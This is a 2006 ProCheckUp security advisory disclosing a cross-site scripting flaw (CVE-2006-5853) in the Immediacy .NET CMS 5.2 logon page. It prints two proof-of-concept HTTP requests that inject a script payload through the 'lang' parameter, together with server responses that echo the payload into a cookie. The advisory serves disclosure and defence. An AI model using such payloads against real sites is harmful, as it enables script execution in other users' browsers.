PR05-06: Immediacy .NET CMS possibly vulnerable to Cross Site Scripting through a
malformed cookie
This advisory has been published following consultation with UK NISCC
Date Found: 27th February 2005
Date Public: 7th November 2006
Vulnerable: Immediacy .NET CMS 5.2.
Severity: Low
CVE reference: CVE-2006-5853
BID: 20965
Description:
Immediacy CMS appears to allow Cross Site Scripting attacks via a malformed 'Set-Cookie:' header. This
issue concerns the 'logon.aspx'
program and 'lang' variable. This could allow attackers to cause the execution
of malicious script code within the
context of the vulnerable site.
Note: web browser-specific CRLF injection techniques may be required in order to exploit this issue.
Information:
REQUEST:
GET /logon.aspx?lang=<SCRIPT>alert('Can%20Cross%20Site%20Attack')</SCRIPT> HTTP/1.1
Host: example.host.co.uk
Cookie: ASINFO=...; ASP.NET_SessionId=...; CNBOOK=...; ASPSESSIONIDSCDAQTST=...
Referer: http://example.host.co.uk:80/environ.pl
User-Agent: Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0; T312461; .NET CLR 1.0.3705)
Connection: close
RESULT:
HTTP/1.1 302 Found
Connection: close
Date: Sun, 27 Feb 2005 19:18:31 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Location: /generalerror.aspx?aspxerrorpath=/logon.aspx
Set-Cookie: lang=<SCRIPT>alert('Can Cross Site Attack')</SCRIPT>; expires=Mon, 27-Jun-2005 18:18:31
GMT; path=/
Content-Type: text/html; charset=utf-8
Content-Length: 161
Set-Cookie: ASINFO=...
Set-Cookie: CNBOOK=...
Cache-Control: proxy-revalidate
<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href='/generalerror.aspx?aspxerrorpath=/logon.aspx'>here</a>.</h2>
</body></html>
It is also possible to submit the request using byte-encoded characters:
REQUEST:
GET /logon.aspx?lang=%3CSCRIPT%3Ealert%28'Can%20Cross%20Site%20Attack'%29%3C%2FSCRIPT%
3E&page=272& HTTP/1.1
Host: example.host.co.uk
Cookie: ASINFO=...; lang=cy; ASP.NET_SessionId=...; CNBOOK=ClearNet; ASPSESSIONIDSCDAQTST=...
Referer: http://example.host.co.uk:80/default.aspx
User-Agent: Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0; T312461; .NET CLR 1.0.3705)
Connection: close
RESULTS:
HTTP/1.1 302 Found
Connection: close
Date: Sun, 27 Feb 2005 19:29:27 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Location: /generalerror.aspx?aspxerrorpath=/logon.aspx
Set-Cookie: lang=<SCRIPT>alert('Can Cross Site Attack')</SCRIPT>; expires=Mon, 27-Jun-2005 18:29:27
GMT; path=/
Content-Type: text/html; charset=utf-8
Content-Length: 161
Set-Cookie: ASINFO=...
Set-Cookie: CNBOOK=ClearNet;path=/;domain=.host.co.uk;expires=Fri, 31 Dec 2010 00:00:01 GMT
Cache-Control: proxy-revalidate
<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href='/generalerror.aspx?aspxerrorpath=/logon.aspx'>here</a>.</h2>
</body></html>
Consequences:
An attacker might cause the execution of malicious script code in the client (web browser) within the context
of the site running
the vulnerable version of Immediacy .NET CMS.
Fix:
Contact vendor. Ensure all input is filtered, especially the '<' and '>' characters.
Authors: Gemma Hughes of ProCheckUp Ltd.
References:
http://www.immediacy.co.uk/
Legal:
Copyright 2006 ProCheckUp Ltd. All rights reserved.
Permission is granted for copying and circulating this Bulletin to the Internet community for the purpose of
alerting them to problems, if and only if the Bulletin is not
changed or edited in any way, is attributed to
ProCheckUp, and provided such reproduction and/or distribution is performed for non-commercial purposes.
Any other use of this information is prohibited. ProCheckUp is not liable for any misuse of this information
by any third party.
ProCheckUp is not responsible for the content of external Internet sites. |
